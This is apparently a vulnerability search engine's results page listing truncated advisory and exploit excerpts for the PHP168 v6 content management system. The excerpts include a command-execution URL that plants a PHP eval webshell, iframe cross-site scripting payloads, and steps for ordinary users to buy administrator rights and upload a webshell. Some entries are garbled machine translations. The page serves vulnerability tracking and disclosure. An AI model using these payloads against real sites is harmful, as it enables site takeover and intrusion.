CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

65 matches found

myhack58•added 2010/07/23 12:0 a.m.•9 views

PHP168 V6. 0 2 a tasteless hole-vulnerability and early warning-the black bar safety net

Today inadvertently found a PHP168 V6. 0 2 BUG With that job download any file properties almost Only this time is to take an arbitrary file and then copy a jpg out of it! Attach a proof path! ! Picture Vulnerability file appears in the “do/cutimg.php” ? php requiredirnameFILE."/"." global.php";...

myhack58•added 2010/06/29 12:0 a.m.•10 views

PHP168 V6 download any file vulnerability-vulnerability warning-the black bar safety net

漏洞文件 download.php Vulnerability related to the file HASH b912249a22b630c04f7ad65f8ba5a2f6 download.php $url=base64decode$url; //2 line 7 $fileurl=strreplace$webdbwwwurl,"",$url; if eregi". php$",$fileurl && isfilePHP168PATH."$ fileurl" //determine the file drop out is not php, if it is php, and...

seebug.org•added 2010/06/19 12:0 a.m.•16 views

PHP168 V6.01 权限提升漏洞

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用 HPCMS V6.01存在严重的安全问题 PHP168 V6.01 厂商补丁： PHP168 -------- 目前厂商已经提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.php168.net/ 注册一个帐户，进入会员中心。访问http：//ssvdb.com/member/buygroup.php?job=buy&gid=3 你会看到如下字样。...

myhack58•added 2010/05/06 12:0 a.m.•13 views

php168 buy get administrator privileges 0day-vulnerability warning-the black bar safety net

The exploit: the 1. Registered normal user 2. By http://site/buygroup.php?job=buy&gid=3purchase administrator privileges. 3. The background that 2webshell...

seebug.org•added 2010/05/04 12:0 a.m.•18 views

PHP168 V6.02 form.php存在跨站漏洞

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用程序因 form.php页面过滤不严导致跨站脚本攻击漏洞 PHP168 V6.0220100504 厂商补丁： PHP168 -------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.php168.net/ http://www.target.com/do/form.php?mid=3"XSS...

myhack58•added 2010/05/02 12:0 a.m.•25 views

PHP168 V6. 0 2 cross-site vulnerability-vulnerability warning-the black bar safety net

PHP168 whole Station is the PHP field is currently the most powerful built Station system, all open source, can be extremely convenient for secondary development, All modules can be freely installed and removed, the individual user is completely free to use. Test code:...

seebug.org•added 2010/05/02 12:0 a.m.•25 views

PHP168 V6.02 vote.php存在跨站漏洞

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用。跨站demo: http://v6.php168.com/do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E PHP168 V6.02 等待补丁 /do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E...

myhack58•added 2010/05/01 12:0 a.m.•12 views

php168 get the administrator 0day-vulnerability warning-the black bar safety net

Due to php168 program to the user group permission to buy the improper handling, so that ordinary users have to purchase the administrator permissions, so as to obtain administrative privileges. The exploit: the 1. Registered normal user 2. By...

myhack58•added 2009/12/30 12:0 a.m.•16 views

php168 v6. 0 vulnerability-vulnerability warning-the black bar safety net

php168 v6. 0 vulnerability description: The two-step first do/jsarticle. php file if! eregi"^hot|com|new|lastview|like|pic$",$type die"Type Error"; $FileName=dirnameFILE."/../ cache/jsarticlecache/"; if$type==’like’ $FileName.= floor$id/3 0 0 0."/"; else unset$id; $FileName.=" $type$fid$id. php";...

myhack58•added 2009/12/27 12:0 a.m.•22 views

php168v6 getshell 0day-vulnerability warning-the black bar safety net

SEBUG-Appdir:Php168 Published:2009-12-26 Affected version: php168 v6. 0 vulnerability description: The two-step first do/jsarticle. php file if! eregi"^hot|com|new|lastview|like|pic$",$type die"Type Error"; $FileName=dirnameFILE."/../ cache/jsarticlecache/"; if$type==’like’ $FileName.= floor$id/3...

myhack58•added 2009/12/11 12:0 a.m.•29 views

php168 v6. 0 get shell vulnerability-vulnerability warning-the black bar safety net

by:mrxhming The two-step first do/jsarticle. php file if! eregi"^hot|com|new|lastview|like|pic$",$type die"Type Error"; $FileName=dirnameFILE."/../ cache/jsarticlecache/"; if$type==’like’ $FileName.= floor$id/3 0 0 0."/"; else unset$id; $FileName.=" $type$fid$id. php"; .................. if!...

myhack58•added 2009/11/13 12:0 a.m.•8 views

PHP168 background to modify an arbitrary file vulnerability-vulnerability warning-the black bar safety net

Off-hook to: AkaLz's Blog PHP168 background check/modify any file loopholes Affected version: PHP168 all take template edit version Vulnerability description: PHP168 whole Station system has been affected by the majority of users Pro-gaze, it with its strong, stable, secure and flexible, easy to...

myhack58•added 2009/11/05 12:0 a.m.•10 views

PHP168 background check/modify any file vulnerability-vulnerability warning-the black bar safety net

Vulnerability information: Affect the program:PHP168 all take template edit version Author:esnra Released on:http://www.3hack.com Use Conditions:have permission to enter the background Using the method: Into the function centre,find the style/template settings,selected style management ! 文章来自...

exploitpack•added 2009/10/28 12:0 a.m.•9 views

PHP168 6.0 - Command Execution

PHP168 6.0 - Command Execution Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discoverd By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...

securityvulns•added 2009/10/28 12:0 a.m.•39 views

PHP168 v6.0 rc

Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discoverd By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=?php20@eval$POSTs;?...

0day.today•added 2009/10/28 12:0 a.m.•13 views

PHP168 6.0 Command Execution

Exploit for unknown platform in category web applications ============================ PHP168 6.0 Command Execution ============================ Application Info: Name: PHP168 Version: 6.0 Discoverd By: Securitylab http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...

Exploit DB•added 2009/10/28 12:0 a.m.•26 views

PHP168 6.0 - Command Execution

Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discoverd By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...

Packet Storm•added 2009/10/28 12:0 a.m.•13 views

PHP168 6.0 Command Execution

Securitylab.ir Application Info: Name: PHP168 Version: 6.0 Discoverd By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir http://site.com/login.php?makehtml=1&chdbhtmlname=seek.php&chdbpath=cache&content=...

seebug.org•added 2009/10/28 12:0 a.m.•8 views

PHP168 6.0 Command Execution

No description provided by source...

myhack58•added 2009/10/26 12:0 a.m.•10 views

PHP168 6.0 and below the version of the vulnerability and use-vulnerability and early warning-the black bar safety net

Danger level: high X Affected versions: PHP168 6.0 the following versions Intruders can be in the user landing page to construct a special statement, the PHP word written to the cache directory, so as to obtain the use of PHP168 whole Station program website the WEBSHELL permissions. Test...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by